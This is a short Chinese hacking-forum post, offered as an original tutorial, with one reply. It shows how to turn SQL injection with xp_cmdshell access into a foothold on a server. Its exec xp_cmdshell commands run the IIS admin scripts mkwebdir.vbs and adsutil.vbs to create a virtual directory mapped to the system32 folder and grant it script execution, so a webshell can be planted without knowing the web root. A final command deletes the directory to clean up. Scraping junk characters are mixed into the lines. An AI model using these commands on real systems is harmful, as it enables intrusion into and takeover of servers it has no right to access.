返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:1 m! }7 F& _0 |
! }! Y; u& |: T! s# ?6 B
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
: l2 V/ `- x  c1 K$ X) O$ q2 _7 [. y建立虚拟目录win,指向c:\windows\system32
/ j& D' [  O6 xexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
$ M8 `* D+ R2 \0 M让win句有解析asp脚本权限
) F2 N5 x4 n! w9 I
1 i' ]+ j5 F! X6 J" j" A) oexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/", k- v9 _% A8 j9 Q* D
删除虚拟目录。
, R. ?9 A7 L9 a+ }0 W' T找不到web绝对路径的一种解决办法,( d7 F' S  o! ]9 R# `
* x& g6 F5 x5 u3 D  O* {  g: F
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表